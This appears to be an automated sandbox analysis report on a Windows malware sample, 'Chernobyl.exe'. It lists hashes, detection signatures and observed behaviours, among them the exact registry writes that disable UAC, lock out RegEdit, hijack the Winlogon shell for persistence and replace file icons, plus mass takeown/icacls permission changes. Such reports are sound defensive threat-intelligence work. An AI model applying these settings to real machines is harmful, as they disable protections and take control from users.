Analysis
-
max time kernel
92s -
max time network
18s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
03-03-2024 01:14
Static task
static1
Behavioral task
behavioral1
Sample
Chernobyl.exe
Resource
win7-20240221-en
General
-
Target
Chernobyl.exe
-
Size
413KB
-
MD5
90f47855c0625fc0afa000b37ba4bcd3
-
SHA1
02970d2f2f98d3929f3758e214fc17b819eb132b
-
SHA256
c28963a7530038ed4bb19864f0dc1d55cf123d2d66059f24f6e4cee39b61e590
-
SHA512
2571869e76207db86883b01d3f03eb6d58bf31a9e8409353f8372dfc21f61430538eb191084856aacb843cfe65c96815249979cbd163c1e11c96e3900bad798e
-
SSDEEP
6144:FHvbVLjo0222222222222222222222222222222222222222222222222222222L:FOtH0zOZzv4TatsNqaJx
Malware Config
Signatures
-
Contains code to disable Windows Defender 3 IoCs
A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.
Processes:
resource yara_rule behavioral1/memory/2164-0-0x000000013FB20000-0x000000013FB8C000-memory.dmp disable_win_def behavioral1/memory/2164-2-0x000000001BA00000-0x000000001BA80000-memory.dmp disable_win_def behavioral1/memory/2164-110-0x000000001BA00000-0x000000001BA80000-memory.dmp disable_win_def -
Modifies WinLogon for persistence 2 TTPs 1 IoCs
Processes:
Chernobyl.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, cluttscape.exe" Chernobyl.exe -
Processes:
Chernobyl.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" Chernobyl.exe -
Disables RegEdit via registry modification 1 IoCs
Processes:
Chernobyl.exedescription ioc process Set value (int) \REGISTRY\USER\S-1-5-21-778096762-2241304387-192235952-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" Chernobyl.exe -
Disables Task Manager via registry modification
-
Possible privilege escalation attempt 64 IoCs
Processes:
icacls.exeicacls.exetakeown.exeicacls.exetakeown.exeicacls.exetakeown.exetakeown.exeicacls.exetakeown.exetakeown.exeicacls.exetakeown.exeicacls.exeicacls.exetakeown.exetakeown.exetakeown.exeicacls.exetakeown.exetakeown.exetakeown.exetakeown.exeicacls.exeicacls.exetakeown.exetakeown.exeicacls.exeicacls.exetakeown.exetakeown.exeicacls.exeicacls.exetakeown.exeicacls.exeicacls.exetakeown.exeicacls.exetakeown.exetakeown.exeicacls.exetakeown.exeicacls.exetakeown.exetakeown.exetakeown.exeicacls.exetakeown.exetakeown.exeicacls.exeicacls.exeicacls.exetakeown.exetakeown.exetakeown.exeicacls.exepid process 4668 icacls.exe 4640 icacls.exe 3452 takeown.exe 4100 icacls.exe 4488 takeown.exe 3292 icacls.exe 3628 takeown.exe 3924 takeown.exe 3840 icacls.exe 4276 takeown.exe 5036 takeown.exe 4984 icacls.exe 5712 592 takeown.exe 1444 icacls.exe 1444 icacls.exe 3976 takeown.exe 4292 takeown.exe 4676 takeown.exe 5024 icacls.exe 2796 takeown.exe 3840 takeown.exe 3832 takeown.exe 3552 takeown.exe 4376 icacls.exe 4440 icacls.exe 4876 takeown.exe 3100 takeown.exe 3212 icacls.exe 2484 icacls.exe 3800 3632 takeown.exe 3224 takeown.exe 3352 3836 icacls.exe 3660 icacls.exe 4276 takeown.exe 3920 icacls.exe 4596 icacls.exe 4264 takeown.exe 5492 4048 icacls.exe 3944 takeown.exe 3596 takeown.exe 3768 icacls.exe 2364 takeown.exe 3756 icacls.exe 3100 takeown.exe 4056 takeown.exe 5728 5860 2272 takeown.exe 3788 icacls.exe 3940 takeown.exe 3444 takeown.exe 4244 icacls.exe 5032 icacls.exe 5020 icacls.exe 4740 2560 takeown.exe 3700 takeown.exe 1396 takeown.exe 5912 3704 icacls.exe -
Modifies file permissions 1 TTPs 64 IoCs
Processes:
icacls.exetakeown.exetakeown.exetakeown.exetakeown.exeicacls.exeicacls.exetakeown.exeicacls.exeicacls.exeicacls.exeicacls.exetakeown.exetakeown.exetakeown.exetakeown.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exeicacls.exeicacls.exetakeown.exeicacls.exeicacls.exetakeown.exetakeown.exeicacls.exeicacls.exeicacls.exetakeown.exetakeown.exetakeown.exetakeown.exeicacls.exeicacls.exeicacls.exetakeown.exeicacls.exeicacls.exeicacls.exetakeown.exetakeown.exeicacls.exeicacls.exetakeown.exepid process 4040 icacls.exe 3828 takeown.exe 3792 takeown.exe 3976 takeown.exe 3088 takeown.exe 4412 icacls.exe 4992 icacls.exe 3836 takeown.exe 3488 icacls.exe 3688 icacls.exe 4672 icacls.exe 4704 icacls.exe 4276 takeown.exe 4452 takeown.exe 4840 takeown.exe 2480 takeown.exe 4300 4916 3420 icacls.exe 4076 icacls.exe 3728 icacls.exe 3416 icacls.exe 4236 icacls.exe 4904 takeown.exe 4232 3512 takeown.exe 5584 5912 5308 4604 takeown.exe 5060 takeown.exe 4860 takeown.exe 3232 takeown.exe 4864 takeown.exe 3708 icacls.exe 3484 icacls.exe 3756 takeown.exe 3756 icacls.exe 3228 icacls.exe 3504 takeown.exe 4088 takeown.exe 4668 icacls.exe 3556 icacls.exe 4288 icacls.exe 4448 takeown.exe 4488 takeown.exe 3448 takeown.exe 4164 takeown.exe 4420 icacls.exe 5244 3188 icacls.exe 5408 3724 icacls.exe 4204 3688 takeown.exe 2484 icacls.exe 4276 icacls.exe 5744 3576 icacls.exe 3428 takeown.exe 4716 takeown.exe 2528 icacls.exe 4300 icacls.exe 4300 takeown.exe -
Modifies system executable filetype association 2 TTPs 1 IoCs
Processes:
Chernobyl.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" Chernobyl.exe -
Processes:
Chernobyl.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" Chernobyl.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Chernobyl.exe -
Modifies WinLogon 2 TTPs 2 IoCs
Processes:
Chernobyl.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AutoRestartShell = "0" Chernobyl.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\DisableCAD = "1" Chernobyl.exe -
Drops file in System32 directory 2 IoCs
Processes:
Chernobyl.exedescription ioc process File opened for modification C:\Windows\System32\kill.ico Chernobyl.exe File opened for modification C:\Windows\System32\wallpaper.jpg Chernobyl.exe -
Drops file in Windows directory 2 IoCs
Processes:
Chernobyl.exedescription ioc process File created C:\Windows\cluttscape.exe Chernobyl.exe File opened for modification C:\Windows\cluttscape.exe Chernobyl.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies File Icons 3 IoCs
Processes:
Chernobyl.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons Chernobyl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons\3 = "C:\\Windows\\System32\\kill.ico" Chernobyl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons\4 = "C:\\Windows\\System32\\kill.ico" Chernobyl.exe -
Modifies registry class 36 IoCs
Processes:
Chernobyl.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\icofile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" Chernobyl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\pnffile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" Chernobyl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\sysfile\DefaultIcon Chernobyl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\textfile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" Chernobyl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\zapfile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" Chernobyl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\jarfile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" Chernobyl.exe Key created \REGISTRY\USER\S-1-5-21-778096762-2241304387-192235952-1000_CLASSES\CLSID Chernobyl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" Chernobyl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\inffile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" Chernobyl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\ratfile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" Chernobyl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\giffile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" Chernobyl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\xmlfile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" Chernobyl.exe Set value (str) \REGISTRY\USER\S-1-5-21-778096762-2241304387-192235952-1000_CLASSES\CLSID\{1248BD21-B584-4EB8-85D0-8EC479CD043B}\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" Chernobyl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\pjpegfile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" Chernobyl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\pngfile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" Chernobyl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\txtfile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" Chernobyl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\jarfile\DefaultIcon Chernobyl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\jntfile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" Chernobyl.exe Key created \REGISTRY\USER\S-1-5-21-778096762-2241304387-192235952-1000_CLASSES\CLSID\{031E4825-7B94-4dc3-B131-E946B44C8DD5} Chernobyl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\htlm\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" Chernobyl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\inifile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" Chernobyl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\JSFile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" Chernobyl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\sysfile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" Chernobyl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\textfile\DefaultIcon Chernobyl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\dllfile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" Chernobyl.exe Key created \REGISTRY\USER\S-1-5-21-778096762-2241304387-192235952-1000_CLASSES\CLSID\{031E4825-7B94-4dc3-B131-E946B44C8DD5}\DefaultIcon Chernobyl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\htlm\DefaultIcon Chernobyl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\icmfile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" Chernobyl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\JSEFile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" Chernobyl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\regfile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" Chernobyl.exe Set value (str) \REGISTRY\USER\S-1-5-21-778096762-2241304387-192235952-1000_CLASSES\CLSID\{031E4825-7B94-4dc3-B131-E946B44C8DD5}\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" Chernobyl.exe Key created \REGISTRY\USER\S-1-5-21-778096762-2241304387-192235952-1000_CLASSES\CLSID\{1248BD21-B584-4EB8-85D0-8EC479CD043B} Chernobyl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\htlm Chernobyl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\jpegfile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" Chernobyl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\mscfile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" Chernobyl.exe Key created \REGISTRY\USER\S-1-5-21-778096762-2241304387-192235952-1000_CLASSES\CLSID\{1248BD21-B584-4EB8-85D0-8EC479CD043B}\DefaultIcon Chernobyl.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
Chernobyl.exepid process 2164 Chernobyl.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
Chernobyl.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exedescription pid process Token: SeDebugPrivilege 2164 Chernobyl.exe Token: SeDebugPrivilege 2164 Chernobyl.exe Token: SeTakeOwnershipPrivilege 2832 takeown.exe Token: SeTakeOwnershipPrivilege 1972 takeown.exe Token: SeTakeOwnershipPrivilege 1468 takeown.exe Token: SeTakeOwnershipPrivilege 936 takeown.exe Token: SeTakeOwnershipPrivilege 2012 takeown.exe Token: SeTakeOwnershipPrivilege 2876 takeown.exe Token: SeTakeOwnershipPrivilege 2560 takeown.exe Token: SeTakeOwnershipPrivilege 2136 takeown.exe Token: SeTakeOwnershipPrivilege 2924 takeown.exe Token: SeTakeOwnershipPrivilege 2480 takeown.exe Token: SeTakeOwnershipPrivilege 2224 takeown.exe Token: SeTakeOwnershipPrivilege 2364 takeown.exe Token: SeTakeOwnershipPrivilege 2116 takeown.exe Token: SeTakeOwnershipPrivilege 704 takeown.exe Token: SeTakeOwnershipPrivilege 2124 takeown.exe Token: SeTakeOwnershipPrivilege 2796 takeown.exe Token: SeTakeOwnershipPrivilege 2932 takeown.exe Token: SeTakeOwnershipPrivilege 564 takeown.exe Token: SeTakeOwnershipPrivilege 1900 takeown.exe Token: SeTakeOwnershipPrivilege 2596 takeown.exe Token: SeTakeOwnershipPrivilege 2364 takeown.exe Token: SeTakeOwnershipPrivilege 2604 takeown.exe Token: SeTakeOwnershipPrivilege 772 takeown.exe Token: SeTakeOwnershipPrivilege 3212 takeown.exe Token: SeTakeOwnershipPrivilege 3240 takeown.exe Token: SeTakeOwnershipPrivilege 3692 takeown.exe Token: SeTakeOwnershipPrivilege 3760 takeown.exe Token: SeTakeOwnershipPrivilege 3892 takeown.exe Token: SeTakeOwnershipPrivilege 3900 takeown.exe Token: SeTakeOwnershipPrivilege 2968 takeown.exe Token: SeTakeOwnershipPrivilege 2528 takeown.exe Token: SeTakeOwnershipPrivilege 3244 takeown.exe Token: SeTakeOwnershipPrivilege 3696 takeown.exe Token: SeTakeOwnershipPrivilege 3756 takeown.exe Token: SeTakeOwnershipPrivilege 3836 takeown.exe Token: SeTakeOwnershipPrivilege 4016 takeown.exe Token: SeTakeOwnershipPrivilege 3088 takeown.exe Token: SeTakeOwnershipPrivilege 4072 takeown.exe Token: SeTakeOwnershipPrivilege 3228 takeown.exe Token: SeTakeOwnershipPrivilege 3328 takeown.exe Token: SeTakeOwnershipPrivilege 3452 takeown.exe Token: SeTakeOwnershipPrivilege 3232 takeown.exe Token: SeTakeOwnershipPrivilege 3224 takeown.exe Token: SeTakeOwnershipPrivilege 3448 takeown.exe Token: SeTakeOwnershipPrivilege 3696 takeown.exe Token: SeTakeOwnershipPrivilege 3552 takeown.exe Token: SeTakeOwnershipPrivilege 3944 takeown.exe Token: SeTakeOwnershipPrivilege 3840 takeown.exe Token: SeTakeOwnershipPrivilege 3764 takeown.exe Token: SeTakeOwnershipPrivilege 3940 takeown.exe Token: SeTakeOwnershipPrivilege 3924 takeown.exe Token: SeTakeOwnershipPrivilege 3328 takeown.exe Token: SeTakeOwnershipPrivilege 3428 takeown.exe Token: SeTakeOwnershipPrivilege 3420 takeown.exe Token: SeTakeOwnershipPrivilege 3572 takeown.exe Token: SeTakeOwnershipPrivilege 3768 takeown.exe Token: SeTakeOwnershipPrivilege 3924 takeown.exe Token: SeTakeOwnershipPrivilege 3828 takeown.exe Token: SeTakeOwnershipPrivilege 3628 takeown.exe Token: SeTakeOwnershipPrivilege 3700 takeown.exe Token: SeTakeOwnershipPrivilege 3476 takeown.exe Token: SeTakeOwnershipPrivilege 112 takeown.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
Chernobyl.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exedescription pid process target process PID 2164 wrote to memory of 1448 2164 Chernobyl.exe cmd.exe PID 2164 wrote to memory of 1448 2164 Chernobyl.exe cmd.exe PID 2164 wrote to memory of 1448 2164 Chernobyl.exe cmd.exe PID 1448 wrote to memory of 2688 1448 cmd.exe rundll32.exe PID 1448 wrote to memory of 2688 1448 cmd.exe rundll32.exe PID 1448 wrote to memory of 2688 1448 cmd.exe rundll32.exe PID 2164 wrote to memory of 972 2164 Chernobyl.exe cmd.exe PID 2164 wrote to memory of 972 2164 Chernobyl.exe cmd.exe PID 2164 wrote to memory of 972 2164 Chernobyl.exe cmd.exe PID 2164 wrote to memory of 2724 2164 Chernobyl.exe cmd.exe PID 2164 wrote to memory of 2724 2164 Chernobyl.exe cmd.exe PID 2164 wrote to memory of 2724 2164 Chernobyl.exe cmd.exe PID 972 wrote to memory of 2328 972 cmd.exe rundll32.exe PID 972 wrote to memory of 2328 972 cmd.exe rundll32.exe PID 972 wrote to memory of 2328 972 cmd.exe rundll32.exe PID 2164 wrote to memory of 2368 2164 Chernobyl.exe cmd.exe PID 2164 wrote to memory of 2368 2164 Chernobyl.exe cmd.exe PID 2164 wrote to memory of 2368 2164 Chernobyl.exe cmd.exe PID 2724 wrote to memory of 1532 2724 cmd.exe rundll32.exe PID 2724 wrote to memory of 1532 2724 cmd.exe rundll32.exe PID 2724 wrote to memory of 1532 2724 cmd.exe rundll32.exe PID 2164 wrote to memory of 2160 2164 Chernobyl.exe cmd.exe PID 2164 wrote to memory of 2160 2164 Chernobyl.exe cmd.exe PID 2164 wrote to memory of 2160 2164 Chernobyl.exe cmd.exe PID 2368 wrote to memory of 1404 2368 cmd.exe rundll32.exe PID 2368 wrote to memory of 1404 2368 cmd.exe rundll32.exe PID 2368 wrote to memory of 1404 2368 cmd.exe rundll32.exe PID 2164 wrote to memory of 1924 2164 Chernobyl.exe cmd.exe PID 2164 wrote to memory of 1924 2164 Chernobyl.exe cmd.exe PID 2164 wrote to memory of 1924 2164 Chernobyl.exe cmd.exe PID 2164 wrote to memory of 2324 2164 Chernobyl.exe cmd.exe PID 2164 wrote to memory of 2324 2164 Chernobyl.exe cmd.exe PID 2164 wrote to memory of 2324 2164 Chernobyl.exe cmd.exe PID 1924 wrote to memory of 1172 1924 cmd.exe rundll32.exe PID 1924 wrote to memory of 1172 1924 cmd.exe rundll32.exe PID 1924 wrote to memory of 1172 1924 cmd.exe rundll32.exe PID 2160 wrote to memory of 1412 2160 cmd.exe rundll32.exe PID 2160 wrote to memory of 1412 2160 cmd.exe rundll32.exe PID 2160 wrote to memory of 1412 2160 cmd.exe rundll32.exe PID 2324 wrote to memory of 1516 2324 cmd.exe rundll32.exe PID 2324 wrote to memory of 1516 2324 cmd.exe rundll32.exe PID 2324 wrote to memory of 1516 2324 cmd.exe rundll32.exe PID 2164 wrote to memory of 1520 2164 Chernobyl.exe cmd.exe PID 2164 wrote to memory of 1520 2164 Chernobyl.exe cmd.exe PID 2164 wrote to memory of 1520 2164 Chernobyl.exe cmd.exe PID 2164 wrote to memory of 864 2164 Chernobyl.exe cmd.exe PID 2164 wrote to memory of 864 2164 Chernobyl.exe cmd.exe PID 2164 wrote to memory of 864 2164 Chernobyl.exe cmd.exe PID 1520 wrote to memory of 2728 1520 cmd.exe rundll32.exe PID 1520 wrote to memory of 2728 1520 cmd.exe rundll32.exe PID 1520 wrote to memory of 2728 1520 cmd.exe rundll32.exe PID 2164 wrote to memory of 2764 2164 Chernobyl.exe cmd.exe PID 2164 wrote to memory of 2764 2164 Chernobyl.exe cmd.exe PID 2164 wrote to memory of 2764 2164 Chernobyl.exe cmd.exe PID 2764 wrote to memory of 2756 2764 cmd.exe rundll32.exe PID 2764 wrote to memory of 2756 2764 cmd.exe rundll32.exe PID 2764 wrote to memory of 2756 2764 cmd.exe rundll32.exe PID 864 wrote to memory of 2148 864 cmd.exe rundll32.exe PID 864 wrote to memory of 2148 864 cmd.exe rundll32.exe PID 864 wrote to memory of 2148 864 cmd.exe rundll32.exe PID 2164 wrote to memory of 2452 2164 Chernobyl.exe cmd.exe PID 2164 wrote to memory of 2452 2164 Chernobyl.exe cmd.exe PID 2164 wrote to memory of 2452 2164 Chernobyl.exe cmd.exe PID 2164 wrote to memory of 2028 2164 Chernobyl.exe cmd.exe -
System policy modification 1 TTPs 3 IoCs
Processes:
Chernobyl.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\shutdownwithoutlogon = "0" Chernobyl.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\UseDefaultTile = "1" Chernobyl.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" Chernobyl.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe"C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe"1⤵
- Modifies WinLogon for persistence
- UAC bypass
- Disables RegEdit via registry modification
- Modifies system executable filetype association
- Checks whether UAC is enabled
- Modifies WinLogon
- Drops file in System32 directory
- Drops file in Windows directory
- Modifies File Icons
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:2164 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵
- Suspicious use of WriteProcessMemory
PID:1448 -
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2688
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵
- Suspicious use of WriteProcessMemory
PID:972 -
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2328
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵
- Suspicious use of WriteProcessMemory
PID:2724 -
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:1532
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵
- Suspicious use of WriteProcessMemory
PID:2368 -
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:1404
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵
- Suspicious use of WriteProcessMemory
PID:2160 -
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:1412
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵
- Suspicious use of WriteProcessMemory
PID:1924 -
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:1172
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵
- Suspicious use of WriteProcessMemory
PID:2324 -
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:1516
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵
- Suspicious use of WriteProcessMemory
PID:1520 -
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2728
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵
- Suspicious use of WriteProcessMemory
PID:864 -
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2148
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵
- Suspicious use of WriteProcessMemory
PID:2764 -
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2756
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2452
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2132
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2028
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:1756
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2820
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:328
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2736
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:1060
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:3044
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:3004
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:1796
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:1484
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:1656
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2380
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:1744
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:1624
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:1460
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2304
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:1188
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:1664
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:1124
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:1960
-
-
-
